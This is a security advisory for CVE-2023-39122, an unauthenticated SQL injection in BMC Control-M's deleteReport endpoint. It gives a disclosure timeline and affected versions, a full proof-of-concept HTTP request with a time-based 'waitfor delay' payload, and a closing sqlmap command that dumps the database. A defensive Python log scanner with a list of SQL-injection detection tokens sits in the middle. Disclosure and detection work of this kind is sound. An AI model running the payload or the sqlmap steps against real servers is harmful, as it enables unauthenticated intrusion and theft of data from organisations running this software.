CVE-2023-39122: GitHub - DojoSecurity/BMC-Control-M-Unauthenticated-SQL-Injection: BMC Control-M Unauthenticated SQL Injection
BMC Control-M Software v9.0.20.200 was discovered to contain a SQL injection vulnerability via the report-id parameter at /report/deleteReport.
BMC Control-M Unauthenticated SQL Injection
BMC Control-M Unauthenticated SQL Injection Version < 9.0.20.200
Timeline:
Vulnerability reported to vendor: 26.08.2022
New fixed 9.0.21 version released: 12.09.2022
Patch for version 9.0.20.200 released: 21.12.2022
Disclosure: 05.06.2023
Affected Products:
BMC Control-M software up to and including 9.0.20.200. The vulnerability was found and confirmed in version 9.0.20.100; information about the patch for version 9.0.20.200 comes from the vendor.
BMC Control-M software versions up to and including 9.0.20.200 are vulnerable to unauthenticated SQL injection.
The vulnerable parameter report-id is present within the /RF-Server/report/deleteReport endpoint.
Below is the Proof of Concept request, which triggers a 10-second delay:
DELETE /RF-Server/report/deleteReport?report-id='+waitfor+delay+'0:0:10'--
Host: [REDACTED]
Connection: close
user-id: X
Accept: application/json, text/plain, */*
server-name:
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: X
Additional Info: The Cookie and user-id headers must be present, but their values can be random.
Screenshot from BurpSuite:
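For defenders, the request above gives a usable detection signature: a DELETE to /RF-Server/report/deleteReport whose report-id is not a plain integer, especially when the response is slow. The following is an added example, not code from the advisory or from BMC; it assumes a simplified access-log format of "METHOD REQUEST_TARGET STATUS DURATION_MS" (the sample lines are constructed) and assumes that legitimate report ids are numeric. It URL-decodes the parameter, checks for SQL tokens, and treats a long response time as corroboration of time-based injection.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory).
# Assumed format: METHOD REQUEST_TARGET STATUS DURATION_MS
SAMPLE_LOG = """\
DELETE /RF-Server/report/deleteReport?report-id=1 200 12
DELETE /RF-Server/report/deleteReport?report-id='+waitfor+delay+'0:0:10'-- 200 10031
DELETE /RF-Server/report/deleteReport?report-id=%27%20AND%201%3D1-- 200 15
GET /RF-Server/report/list?user-id=X 200 8
DELETE /RF-Server/report/deleteReport?report-id=42 200 9
"""

TARGET_PATH = "/RF-Server/report/deleteReport"
TARGET_PARAM = "report-id"
ID_RE = re.compile(r"^\d+$")   # assumption: legitimate report ids are integers
SLOW_MS = 5000                 # corroborating signal for a time-based payload

# Tokens that never belong in a numeric id; matched after URL decoding, case-insensitively
SUSPECT = ("'", "--", ";", "waitfor", "delay", "sleep(", "benchmark(", " or ", " and ", "union")


def parse_line(line):
    """Split one log line into method, path, decoded query parameters, status and latency."""
    method, target, status, ms = line.split()
    parts = urlsplit(target)
    # parse_qs decodes %xx escapes and turns '+' into spaces, so the
    # payload '+waitfor+delay+'0:0:10'-- is seen as ' waitfor delay '0:0:10'--
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"method": method, "path": parts.path, "params": params,
            "status": int(status), "ms": int(ms)}


def inspect(line):
    """Return the reasons a request looks like SQLi on the deleteReport endpoint, or [] if benign."""
    rec = parse_line(line)
    if rec["method"] != "DELETE" or rec["path"] != TARGET_PATH:
        return []
    reasons = []
    for value in rec["params"].get(TARGET_PARAM, []):
        if ID_RE.match(value):
            continue
        reasons.append("non-numeric report-id")
        low = value.lower()
        hits = [tok for tok in SUSPECT if tok in low]
        if hits:
            reasons.append("sql tokens: " + ",".join(hits))
    # A suspicious value plus a slow response is the fingerprint of a successful delay-based probe
    if reasons and rec["ms"] >= SLOW_MS:
        reasons.append(f"slow response {rec['ms']}ms (time-based injection likely succeeded)")
    return reasons


def scan(log_text):
    """Run inspect() over every line; return (line_number, reasons) for each hit."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        reasons = inspect(line)
        if reasons:
            findings.append((n, reasons))
    return findings


if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

Because the endpoint is reachable without a valid session (the Cookie and user-id values are not validated), the rule should fire regardless of whether the request carries plausible-looking authentication headers; in the sample, lines 2 and 3 are flagged and line 2 additionally carries the latency signal.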
Steps to dump the database:
Save the above request (without the payload) to a file request.txt:
DELETE /RF-Server/report/deleteReport?report-id=1
Host: [REDACTED]
Connection: close
user-id: X
Accept: application/json, text/plain, */*
server-name:
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: X
Execute the following sqlmap command:
sqlmap -r request.txt -p report-id --no-cast --dbs
Screenshot of extracted database structure: